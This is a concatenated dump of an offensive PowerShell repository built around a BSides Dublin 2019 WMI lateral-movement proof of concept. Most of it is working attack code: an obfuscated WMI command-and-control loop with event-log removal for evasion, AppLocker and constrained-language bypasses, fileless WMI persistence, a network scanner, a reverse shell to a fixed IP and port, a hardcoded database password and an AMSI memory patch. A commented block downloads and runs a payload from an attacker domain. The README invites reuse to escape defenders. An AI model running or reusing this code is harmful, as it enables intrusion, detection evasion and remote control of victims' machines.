├── BsidesDublin-2019 ├── A_Post-Exploitation_tale_in_real_life.pdf ├── PoC-demo.gif ├── README.md ├── c2c.ps1 └── class-derivation.ps1 ├── CLM-bypass.ps1 ├── Fileless-wmi-persistence.ps1 ├── HostAndServices.ps1 ├── Reverse-Shell.ps1 ├── SQL_Query.ps1 ├── Semi-interactive-shell-applocker-bypass.ps1 ├── amsi-bypass.ps1 ├── base64-encode.ps1 ├── class-derivation.ps1 ├── multi-host-port-scan.ps1 └── ole-payload-generator.ps1 /BsidesDublin-2019/A_Post-Exploitation_tale_in_real_life.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kmkz/PowerShell/f3fed293e97fb8e2f1970bc30228e7b4a25a1d1b/BsidesDublin-2019/A_Post-Exploitation_tale_in_real_life.pdf -------------------------------------------------------------------------------- /BsidesDublin-2019/PoC-demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kmkz/PowerShell/f3fed293e97fb8e2f1970bc30228e7b4a25a1d1b/BsidesDublin-2019/PoC-demo.gif -------------------------------------------------------------------------------- /BsidesDublin-2019/README.md: -------------------------------------------------------------------------------- 1 | Fud WMI for lateral movement (PoC) - ##BsidesDub 2019## 2 | ============ 3 | 4 | Author: kmkz - [@kmkz_security](https://twitter.com/kmkz_security) 5 | 6 | ## Intro 7 | 8 | This repository contains the PowerShell WMI based Proof of Concept for advanced lateral movement as presented at BsidesDub 2019. 9 | 10 | The main goal of this project was to demonstrate the techniques an attacker might use to bypass detection mechanisms using many techniques in real-life condition. 11 | 12 | It implement random class name derivation mechanism, payload obfuscation, in-memory execution without any call to IEX nor IWR for the stage 1 dropper and an EventViewer logs removal through WMI un-subscription method. 13 | 14 | Additionally, it use **WMI only** (no WinRM) and do not interact with registry keys to avoid registry monitoring based detection. 15 | 16 | Of course, **feel free to reuse code parts for your own purpose in case of need to escape blue team or for simply test-it**. 17 | 18 | 19 | 20 | ## Details 21 | 22 | **Stage 1** (executed on attacker's side): 23 | 24 | The "stage 1" is a simple dropper for payload delivery through UNC/WebDAV using basic obfuscation (require admin. privs for RCE over WMI ofc). 25 | 26 | It is executed from attackers station (C2C) to run in-memory fud PowerShell without the well-known `IWR/IEX` method calls. 27 | 28 | [*] Notes: 29 | 30 | UNC/WebDAV could be replaced by WMI namespaces as presented in WmiSploit project `https://github.com/secabstraction/WmiSploit`. 31 | 32 | However, the executed command is then limited to 8190 chars due to `-EncodedCommand` usage for b64 payload, this is the reason why I prefered this method for the PoC. 33 | 34 | An important thing here is that .ps1 file is executed over WMI without `invoke-expression` (iex) nor `wget/invoke-webrequest` (iwr) method to prevent alerting. 35 | 36 | Classic stager from command line: 37 | ``` 38 | wmic.exe /node:"Victime-PC" /user:WORKGROUP\admin process call create "PowErSheLl -eXecUtIonpOliCY BypAsS -NopRofilE -fILe \\Vboxsvr\shared\BSIDESIE\class-derivation.ps1" 39 | ``` 40 | 41 | 42 | **Stage 2** (executed on target): 43 | 44 | In-memory build stage 2 using "-File" parameter (obfuscated PowerShell with random Class Derivation). 45 | 46 | Randomly generated class derivation and "EventViewer" logs removing for detection mechanisms/blue team evasion. 47 | 48 | Stage 1 execution is not removed from logs for debug purpose, it should be modified for a total discretion ;). 49 | 50 | 51 | [*] Notes: 52 | 53 | C2C shell could be used in combination to unicorn to obtains Meterpreter session (stage 2 could be modified depending on the use case): 54 | 55 | Examples: `powershell.exe -eXecUtIOnpOlICy BypAsS -File "\\Vboxsvr\shared\BSIDESIE\pwner.ps1"` 56 | 57 | IMPORTANT: Payload delivery using "-File" parameter also permit to add hashes collection when payload (stage 2) is triggered. 58 | 59 | **stage 3** (executed on target): 60 | 61 | Payload execution and output push/pull via a random file located on attacker's server. 62 | 63 | ## Demo 64 | 65 | ![](PoC-demo.gif) 66 | 67 | 68 | ## Thanks 69 | 70 | - @philiptsukerman - WMI guru - https://github.com/Cybereason/Invoke-WMILM 71 | - @arno0x0x - how to say that... its scripts helped me so often during post-exploitation steps... - https://github.com/Arno0x 72 | - @mattifestation - a ton of useful research and publications 73 | - @secabstraction - https://github.com/secabstraction/WmiSploit 74 | - @all: 'cause we all need others to go further! 75 | -------------------------------------------------------------------------------- /BsidesDublin-2019/c2c.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | PowerShell C2C PoC (WMI based) for defenses mechanism and blue team evasion using randomly generated and obfucated PowerShell derivated Class through multi-staged payload. 4 | 5 | .NOTES 6 | File Name : c2c.ps1 7 | Author : J.M Bourbon 8 | Contact : mail.bourbon@gmail.com - @kmkz_security 9 | #> 10 | 11 | Do { 12 | Clear-Host 13 | 14 | # UNC folder's cleaning: 15 | $Out="\\Vboxsvr\shared\BSIDESIE\*.lol" 16 | $Cmd= "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt" 17 | 18 | if(Test-Path -Path $Out){ Remove-Item $Out } 19 | if(Test-Path -Path $Cmd){ Remove-Item $Cmd } 20 | 21 | # Prepare the command to execute remotely through UNC path (or WebDav): 22 | $Exit="N" 23 | Write-Host "`n`n[$Target] shell#: " -NoNewline -ForegroundColor yellow 24 | $NewCmd = Read-Host 25 | 26 | if ($NewCmd -eq "exit"){ 27 | if(Test-Path -Path $Out){ Remove-Item $Out } 28 | if(Test-Path -Path $Cmd){ Remove-Item $Cmd } 29 | Clear-Host "`n Ok thx bye ;)`n" 30 | exit 31 | } 32 | 33 | Add-Content "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt" $NewCmd 34 | 35 | 36 | ## Stage 1 (payload delivery/dropper): 37 | # Payload arguments: 38 | Write-Host "`n`n Stage 1 initilization... " -NoNewline 39 | $Stage2UncPath="\\Vboxsvr\shared\BSIDESIE\V1\class-derivation.ps1" 40 | $Dropper = "PowErSheLl -eXecUtiOnpOliCY BypAsS -nOp -fILe $Stage2UncPath" 41 | $Target = "Victime-PC" 42 | 43 | # Stage2 payload: 44 | Write-Host "[DONE]`n`n Stage 2 initilization... " -NoNewline 45 | 46 | if(! (Test-Path -Path $Stage2UncPath)){ 47 | Write-Host "[FAILED]`n`nExiting!`n" -ForegroundColor red 48 | exit 49 | } 50 | $zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft') 51 | $CoFtfEgvsJ = [wMicLaSs]$zNrF 52 | $YepTa = "pRoc"+"eSs" 53 | $PoDtbeF4Dp= "mY"+"Evi"+"l"+$Yepa 54 | $N = $CoFtfEgvsJ.dEriVe($PoDtbeF4Dp) 55 | $N.pUt() | out-null 56 | 57 | Write-Host "[DONE]`n`n Stage 3 initilization... [DONE]" 58 | Write-Host "`n`n Delivering payload on remote target..." -NoNewline -ForegroundColor Yellow 59 | 60 | # This part (our stage 1 execution) is catched 'cause invoke-wmimethod do not apply class derivation and use "win32_Process" on target side. 61 | # Class derivation is then applied on attacker's station here. 62 | # >> Should be adapted for full detection escape 63 | iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst $Dropper -Impersonation 3 -Credential WORKGROUP\admin -ComputerName $Target | out-null 64 | Write-Host "[PWNED!]`n" -ForegroundColor red 65 | 66 | For ($i=3; $i -ge 0; $i–-) { 67 | Write-Progress -Activity "Executing stage 3" -SecondsRemaining $i 68 | sleep(0.6) 69 | } 70 | Write-Progress -Activity "Executing stage 3" -Completed 71 | 72 | # Once executed, print the command output stored on UNC share: 73 | $Out="\\Vboxsvr\shared\BSIDESIE\*.lol" 74 | Write-Host "`n`n[$Target] shell#: " -NoNewline -ForegroundColor yellow 75 | Get-Content $Out 76 | 77 | $Exit = Read-Host "`n Do you want to continue? (Y/N)" 78 | 79 | } # Exiting PoC, that's enough! 80 | while ($Exit -ne "N") 81 | Clear-Host 82 | "`n Ok thx bye ;)`n" -------------------------------------------------------------------------------- /BsidesDublin-2019/class-derivation.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | PowerShell WMI based PoC for defenses mechanism and blue team evasion using randomly generated and obfucated PowerShell Class Derivation remotely (staged). 4 | 5 | .DESCRIPTION 6 | 7 | * Stage 1 (executed on attacker's side): 8 | 9 | The "stage 1" is a simple dropper for payload delivery through UNC/WebDAV using basic obfuscation (require admin. privs for RCE over WMI ofc). 10 | It is executed from attackers station (C2C) to run in-memory fud PowerShell without the well-known `IWR/IEX` method calls. 11 | 12 | (+) Notes: 13 | UNC/WebDAV could be replaced by WMI namespaces as presented in WmiSploit project `https://github.com/secabstraction/WmiSploit`. 14 | However, the executed command is then limited to 8190 chars due to `-EncodedCommand` usage for b64 payload, this is the reason why I prefered this method for the PoC. 15 | 16 | Note that .ps1 file is executed over WMI without `invoke-expression` (iex) nor `wget/invoke-webrequest` (iwr) method to prevent alerting. 17 | Classic stager from command line: 18 | `wmic.exe /node:"Victime-PC" /user:WORKGROUP\admin process call create "PowErSheLl -eXecUtIonpOliCY BypAsS -NopRofilE -fILe \\Vboxsvr\shared\BSIDESIE\class-derivation.ps1"` 19 | 20 | 21 | * Stage 2 (executed on target): 22 | 23 | In-memory build stage 2 using "-File" parameter (obfuscated PowerShell with random Class Derivation). 24 | 25 | Randomly generated class derivation and "EventViewer" logs removing for detection mechanisms/blue team evasion. 26 | Stage 1 execution is not removed from logs for demo purpose, it should be modified for a total discretion ;). 27 | 28 | (+) Notes 29 | C2C shell could be used in combination to unicorn to obtains Meterpreter session (stage 2 could be modified depending on the use case): 30 | 31 | Examples: `powershell.exe -eXecUtIOnpOlICy BypAsS -File "\\Vboxsvr\shared\BSIDESIE\pwner.ps1"` 32 | 33 | IMPORTANT: Payload delivery using "-File" parameter also permit to add hashes collection when payload (stage 2) is triggered. 34 | 35 | * stage 3 (executed on target): 36 | 37 | Payload execution and output push/pull via a random file located on attacker's server. 38 | 39 | 40 | .NOTES 41 | File Name : class-derivation.ps1 42 | Author : J.M Bourbon 43 | Contact : mail.bourbon@gmail.com - @kmkz_security 44 | 45 | #> 46 | 47 | function GenerateRandomName(){ 48 | 49 | $Pf = "abcdefghijkmnopqrstuvwxyzABCEFGHJKLMNPQRSTUVWXYZ23456789".TOchArarRay() 50 | $rSVdssS1="" 51 | 1..10 | ForEach { $rSVdssS1 += $Pf | Get-Random } 52 | return $rSVdssS1 53 | } 54 | 55 | # Remove Application logs in "EventViewer": 56 | Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'"| Remove-WmiObject 57 | Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'"| Remove-WmiObject 58 | 59 | $zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft') 60 | $CoFtfEgvsJ = [wMicLaSs]$zNrF 61 | $YepTa = "pRoc"+"eSs" 62 | $PoDtbeF4Dp= GenerateRandomName 63 | $N = $CoFtfEgvsJ.dEriVe("$PoDtbeF4Dp") 64 | $N.pUt() 65 | $BlzQ=0 66 | $VrBnZ=111-1+3+7+5+5-3+$BlzQ 67 | $CpOnBt5= gEt-cOntEnt -paTh "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt" 68 | 69 | # Output filename generation: 70 | $rSVdssS=GenerateRandomName 71 | 72 | 73 | # 1 - For Remote usage (pivot) use wmic over wmi (Eh, why not?). Tested with a specific usecase, should be adapted: 74 | iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "wMIc /nOdE:$VrBnZ.$BlzQ.$BlzQ.1 $YepTa caLl cReAte 'cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$rSVdssS.lol'" 75 | 76 | # 2 - For a classic command execution. Tip: use "lolbins" from lolbas project (lolbas-project.github.io) for better mitigations/detections bypassing 77 | # iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$rSVdssS.lol" -------------------------------------------------------------------------------- /CLM-bypass.ps1: -------------------------------------------------------------------------------- 1 | # 2 | # AppLocker PowerShell CLM Bypass 3 | # 4 | # Set CLM:   5 | # $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage" 6 | # 7 | # 8 | 9 | $CurrTemp = $env:temp 10 | $CurrTmp = $env:tmp 11 | $TEMPBypassPath = "C:\windows\temp" 12 | $TMPBypassPath = "C:\windows\temp" 13 | 14 | Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TEMPBypassPath" 15 | Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath" 16 | 17 | Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "powershell" 18 | sleep 5 19 | 20 | #Set it back 21 | Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp 22 | Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $CurrTemp -------------------------------------------------------------------------------- /Fileless-wmi-persistence.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | Credits to @mattifestation for his awesome work on WMI and Powershell Fileless Persistence. 3 | This script is an adaptation of his work. 4 | Base: https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1 5 | 6 | //todo: 7 | - Add blue team evasion feature (remove-wmiobject to hide process creation, *Name randomization, etc... but later) 8 | #> 9 | 10 | function Install-Persistence{ 11 | 12 | $EventFilterName = 'Cleanup' 13 | $EventConsumerName = 'DataCleanup' 14 | $finalPayload = "calc.exe" 15 | 16 | # Create event filter 17 | $EventFilterArgs = @{ 18 | EventNamespace = 'root/cimv2' 19 | Name = $EventFilterName 20 | Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" 21 | QueryLanguage = 'WQL' 22 | } 23 | 24 | $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs 25 | 26 | # Create CommandLineEventConsumer 27 | $CommandLineConsumerArgs = @{ 28 | Name = $EventConsumerName 29 | CommandLineTemplate = $finalPayload 30 | } 31 | $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs 32 | 33 | # Create FilterToConsumerBinding 34 | $FilterToConsumerArgs = @{ 35 | Filter = $Filter 36 | Consumer = $Consumer 37 | } 38 | $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs 39 | 40 | #Confirm the Event Filter was created 41 | $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'" 42 | if ($EventCheck -ne $null) { 43 | Write-Host "Event Filter $EventFilterName successfully written to host" 44 | } 45 | 46 | #Confirm the Event Consumer was created 47 | $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'" 48 | if ($ConsumerCheck -ne $null) { 49 | Write-Host "Event Consumer $EventConsumerName successfully written to host" 50 | } 51 | 52 | #Confirm the FiltertoConsumer was created 53 | $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'""" 54 | if ($BindingCheck -ne $null){ 55 | Write-Host "Filter To Consumer Binding successfully written to host" 56 | } 57 | 58 | } 59 | 60 | <# 61 | function Remove-Persistence{ 62 | $EventFilterName = 'Cleanup' 63 | $EventConsumerName = 'DataCleanup' 64 | 65 | # Clean up Code - 66 | # /!\ Comment this code out when you are installing persistence /!\ 67 | 68 | $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'" 69 | $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'" 70 | $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" 71 | 72 | $FilterConsumerBindingToCleanup | Remove-WmiObject 73 | $EventConsumerToCleanup | Remove-WmiObject 74 | $EventFilterToCleanup | Remove-WmiObject 75 | 76 | } 77 | #> 78 | 79 | function Check-WMI{ 80 | Write-Host "Showing All Root Event Filters" 81 | Get-WmiObject -Namespace root/subscription -Class __EventFilter 82 | 83 | Write-Host "Showing All CommandLine Event Consumers" 84 | Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer 85 | 86 | Write-Host "Showing All Filter to Consumer Bindings" 87 | Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding 88 | } 89 | -------------------------------------------------------------------------------- /HostAndServices.ps1: -------------------------------------------------------------------------------- 1 | # A short and (a bit) slow script for reconnaissance purpose on restritect environment. 2 | # Step 1: perform ping_sweep 3 | # Step 2: when host is up, do services scan based on the pre-defined port list (web, db or lateral_movement, create your own!) 4 | 5 | 50..100 | %{ 6 | 7 | # ping sweep part 8 | $ip = "10.0.0.$_"; 9 | write-host "Tesing host $ip ..." 10 | 11 | $Check=$(Test-Connection -count 1 -comp 10.0.0.$_ -quiet) 12 | 13 | 14 | $ErrorActionPreference = "SilentlyContinue" 15 | 16 | if ($Check -eq "True") { 17 | write-host "Host: $ip is alive!" 18 | 19 | 20 | #port scan part 21 | write-host "Scanning ports ..." 22 | 23 | $lateral_mov=@(135,445,3389,5985) 24 | $web=@(80,8080,8443,443) 25 | $db=@(1433,3306,5432) 26 | 27 | ForEach($port in $web){ 28 | 29 | $socket = new-object System.Net.Sockets.TcpClient($ip, $port) 30 | if ($socket -eq $null) { 31 | write-host "$port closed - " -ForegroundColor Red -NoNewline 32 | } 33 | else{ 34 | write-host "$port open !"-foregroundcolor Green -NoNewline 35 | $socket = $null 36 | } 37 | } 38 | write-host "Port scan finished." 39 | } 40 | 41 | } 42 | -------------------------------------------------------------------------------- /Reverse-Shell.ps1: -------------------------------------------------------------------------------- 1 | function CleanUp { 2 | if ($client.Connected -eq $true) { 3 | $client.Close() 4 | } 5 | 6 | if ($process.ExitCode -ne $null) { 7 | $process.Close() 8 | } 9 | 10 | exit 11 | } 12 | 13 | $client = New-Object System.Net.Sockets.TcpClient 14 | $client.Connect('192.168.1.161', 4444) 15 | 16 | if ($client.Connected -ne $true) { 17 | CleanUp 18 | } 19 | 20 | $stream = $client.GetStream(); 21 | $buffer = New-Object System.Byte[] $client.ReceiveBufferSize 22 | 23 | $process = New-Object System.Diagnostics.Process 24 | $process.StartInfo.FileName = 'cmd.exe' 25 | $process.StartInfo.RedirectStandardInput = 1 26 | $process.StartInfo.RedirectStandardOutput = 1 27 | $process.StartInfo.UseShellExecute = 0 28 | $process.Start() 29 | 30 | $inputStream = $process.StandardInput 31 | $outputStream = $process.StandardOutput 32 | 33 | Start-Sleep 1 34 | 35 | $encoding = New-Object System.Text.AsciiEncoding 36 | 37 | while ($outputStream.Peek() -ne -1) { 38 | $output += $encoding.GetString($outputStream.Read()) 39 | } 40 | 41 | $stream.Write($encoding.GetBytes($output), 0, $output.Length) 42 | 43 | $output = $null 44 | 45 | while ($true) { 46 | if ($client.Connected -ne $true) { 47 | CleanUp 48 | } 49 | 50 | $pos = 0 51 | $i = 1 52 | 53 | while (($i -gt 0) -and ($pos -lt $buffer.Length)) { 54 | $read = $stream.Read($buffer, $pos, $buffer.Length - $pos) 55 | $pos += $read 56 | 57 | if ($pos -and ($nb[0..$($pos-1)] -contains 10)) { 58 | break 59 | } 60 | 61 | if ($pos -gt 0) { 62 | $string = $encoding.GetString($buffer, 0, $pos) 63 | $inputStream.Write($string) 64 | Start-Sleep 1 65 | 66 | if ($process.ExitCode -ne $null) { 67 | CleanUp 68 | } else { 69 | $output = $encoding.GetString($outputStream.Read()) 70 | 71 | while ($outputStream.Peek() -ne -1) { 72 | $output += $encoding.GetString($outputStream.Read()) 73 | 74 | if ($output -eq $string) { 75 | $output = '' 76 | } 77 | } 78 | 79 | $stream.Write($encoding.GetBytes($output), 0, $output.Length); 80 | $output = $null 81 | $string = $null 82 | } 83 | } else { 84 | CleanUp 85 | } 86 | } 87 | } 88 | -------------------------------------------------------------------------------- /SQL_Query.ps1: -------------------------------------------------------------------------------- 1 | $Global:SCCMSQLSERVER = "DB-SRV\SQL" 2 | $Global:DBNAME = "DATABASE" 3 | $Global:uid = "sa" 4 | $Global:pwd = "D4passwd" 5 | 6 | Try{ 7 | $SQLConnection = New-Object System.Data.SQLClient.SQLConnection 8 | $SQLConnection.ConnectionString ="server=$SCCMSQLSERVER;database=$DBNAME;Integrated Security=False; uid=$uid; pwd=$pwd" 9 | $SQLConnection.Open() 10 | } 11 | 12 | catch{ 13 | [System.Windows.Forms.MessageBox]::Show("Failed to connect SQL Server:") 14 | 15 | } 16 | 17 | $SQLCommand = New-Object System.Data.SqlClient.SqlCommand 18 | $SQLCommand.CommandText = "SHOW @@version" 19 | $SQLCommand.Connection = $SQLConnection 20 | 21 | $SQLAdapter = New-Object System.Data.SqlClient.SqlDataAdapter 22 | $SqlAdapter.SelectCommand = $SQLCommand 23 | $SQLDataset = New-Object System.Data.DataSet 24 | $SqlAdapter.fill($SQLDataset) | out-null 25 | 26 | $tablevalue = @() 27 | foreach ($data in $SQLDataset.tables[0]){ 28 | $tablevalue = $data[0] 29 | $tablevalue 30 | } 31 | $SQLConnection.close() 32 | -------------------------------------------------------------------------------- /Semi-interactive-shell-applocker-bypass.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | PowerShell WMI Semi-Interactive shell for Applocker Policy Bypass 4 | 5 | .DESCRIPTION 6 | Base payload use the following WMI authenticated (remote) code execution (rce): 7 | wmic /node:127.0.0.1 PROCESS CALL Create "cmd.exe /c netstat -ano >> C:/Temp/test" 8 | 9 | For rce case: 10 | wmic /node:@workstations.txt /user:[admin_for_privileged_rce] process call create "cmd.exe /c netstat -ano >> \\[YourIPaddr]\Temp\test" 11 | (where workstations.txt contains ip address list) 12 | 13 | This one can be used directly in .bat file, in a macro or via "run" if powershell.exe is not available. 14 | The .ps1 and .vba scripts below are examples of functional script and should be adapted following the context. 15 | 16 | .PARAMETER Target 17 | Remote or local machine address or hostname 18 | In case of remote, privileged account is required 19 | 20 | .PARAMETER Command 21 | Command that will be executed on the target 22 | 23 | .PARAMETER Payload 24 | Final string (b64 encoded to escape special chars and spaces) that will be executed (using the "restricted" cmd.exe in this example) 25 | 26 | .PARAMETER Bypass 27 | WMI method that bypass applocker policy using the previously defined payload 28 | 29 | .PARAMETER EncodedPayload 30 | Final base64 encoded payload that permit to use argument such like "net localgroup" in the $Command argument 31 | 32 | .NOTES 33 | File Name : interactive-shell-applocker-bypass.ps1 34 | Author : J.M Bourbon 35 | Contact : mail.bourbon@gmail.com - @kmkz_security 36 | 37 | Introduction: 38 | Done during a mission in order to escape some different Citrix/Applocker restriction (and works well!), it needs 39 | to be cleaned up and improved, I know... I need time first, sorry. 40 | 41 | Script details: 42 | Base 64 encoding is required to permit long string that contains special chars and argument to be correctly executed. 43 | 44 | Sleep time 0.6 is required to read file after process finished. 45 | It should be changed in case of remote code execution to prevent latency, however payload will be executed correctly. 46 | You also can re-run the script in order to read the output file correctly (so diiirty). 47 | 48 | #> 49 | 50 | $Target = "127.0.0.1" 51 | $Command = "net localgroup > C:\temp\result.txt" 52 | $Payload = "CMD.EXE /c "+$Command 53 | 54 | $Bypass=Invoke-WmiMethod -class Win32_process -name Create -ArgumentList $Payload -ComputerName $Target 55 | $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Bypass)) 56 | 57 | Start-Sleep -s 0.6 58 | Get-Content \\$Target\C$\Temp\result.txt 59 | 60 | <# 61 | .SYNOPSIS 62 | PowerShell WMI Semi-Interactive shell VBA Macro (basic) for Applocker Policy bypass 63 | 64 | .DESCRIPTION 65 | Office macro example that reproduce the previous PowerShell script in case of restricted (Citrix etc...) environment. 66 | As there is no base64 encoding, some command could failed, to bypass it, add the b64 encoding before executing payload. 67 | 68 | .EXAMPLE 69 | 70 | Sub sss() 71 | Dim wsh As Object 72 | Set wsh = VBA.CreateObject("WScript.Shell") 73 | Dim waitOnReturn As Boolean: waitOnReturn = True 74 | Dim windowStyle As Integer: windowStyle = 1 75 | 76 | wsh.Run "powershell.exe Invoke-WmiMethod -class Win32_process -name Create -ArgumentList 'cmd.exe /c netstat -ano >> C:/Temp/test' -ComputerName '127.0.0.1'", windowStyle, waitOnReturn 77 | wsh.Run "powershell.exe -NoExit Get-content C:/Temp/test" 78 | End Sub 79 | #> -------------------------------------------------------------------------------- /amsi-bypass.ps1: -------------------------------------------------------------------------------- 1 | ###################################################################################################################################### 2 | # Latest (and useful!) AMSI bypass using egghunting method (from June 2019) 3 | # Last test: 19th May 2020 4 | # 5 | # 6 | # Example on how to use-it for real-life payload delivery : https://github.com/kmkz/exploit/blob/master/Full-payload-delivery-chain.ps1 7 | ###################################################################################################################################### 8 | Write-Host "-- AMSI Patch" 9 | Write-Host "-- Paul Laîné (@am0nsec)" 10 | Write-Host "" 11 | 12 | $Kernel32 = @" 13 | using System; 14 | using System.Runtime.InteropServices; 15 | 16 | public class Kernel32 { 17 | [DllImport("kernel32")] 18 | public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); 19 | 20 | [DllImport("kernel32")] 21 | public static extern IntPtr LoadLibrary(string lpLibFileName); 22 | 23 | [DllImport("kernel32")] 24 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 25 | } 26 | "@ 27 | 28 | Add-Type $Kernel32 29 | 30 | Class Hunter { 31 | static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) { 32 | while ($true) { 33 | [int]$count = 0 34 | 35 | while ($true) { 36 | [IntPtr]$address = [IntPtr]::Add($address, 1) 37 | If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) { 38 | $count++ 39 | If ($count -eq $egg.Length) { 40 | return [IntPtr]::Subtract($address, $egg.Length - 1) 41 | } 42 | } Else { break } 43 | } 44 | } 45 | 46 | return $address 47 | } 48 | } 49 | 50 | [IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll") 51 | Write-Host "[+] AMSI DLL Handle: $hModule" 52 | 53 | [IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow") 54 | Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress" 55 | 56 | If ([IntPtr]::Size -eq 8) { 57 | Write-Host "[+] 64-bits process" 58 | [byte[]]$egg = [byte[]] ( 59 | 0x4C, 0x8B, 0xDC, # mov r11,rsp 60 | 0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx 61 | 0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp 62 | 0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi 63 | 0x57, # push rdi 64 | 0x41, 0x56, # push r14 65 | 0x41, 0x57, # push r15 66 | 0x48, 0x83, 0xEC, 0x70 # sub rsp,70h 67 | ) 68 | } Else { 69 | Write-Host "[+] 32-bits process" 70 | [byte[]]$egg = [byte[]] ( 71 | 0x8B, 0xFF, # mov edi,edi 72 | 0x55, # push ebp 73 | 0x8B, 0xEC, # mov ebp,esp 74 | 0x83, 0xEC, 0x18, # sub esp,18h 75 | 0x53, # push ebx 76 | 0x56 # push esi 77 | ) 78 | } 79 | [IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg) 80 | Write-Host "[+] Targeted address: $targetedAddress" 81 | 82 | $oldProtectionBuffer = 0 83 | [Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null 84 | 85 | $patch = [byte[]] ( 86 | 0x31, 0xC0, # xor rax, rax 87 | 0xC3 # ret 88 | ) 89 | [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3) 90 | 91 | $a = 0 92 | [Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null 93 | 94 | <# 95 | 96 | AMSI bypass historic 97 | 98 | 99 | 100 | ---------------------------------------------------------------------------------------------------------------------- 101 | $mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076); 102 | [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null); 103 | [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem); 104 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; 105 | $e=new-object net.webclient; 106 | $e.proxy=[Net.WebRequest]::GetSystemWebProxy(); 107 | $e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; 108 | IEX $e.downloadstring('http://attacker-trusted-domain/pwn'); 109 | 110 | ###################################################################################################################################### 111 | # Tested on Win10 (31/10/2018) 112 | # 113 | # Source: https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html 114 | ###################################################################################################################################### 115 | 116 | function Bypass-AMSI 117 | { 118 | if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) { 119 | 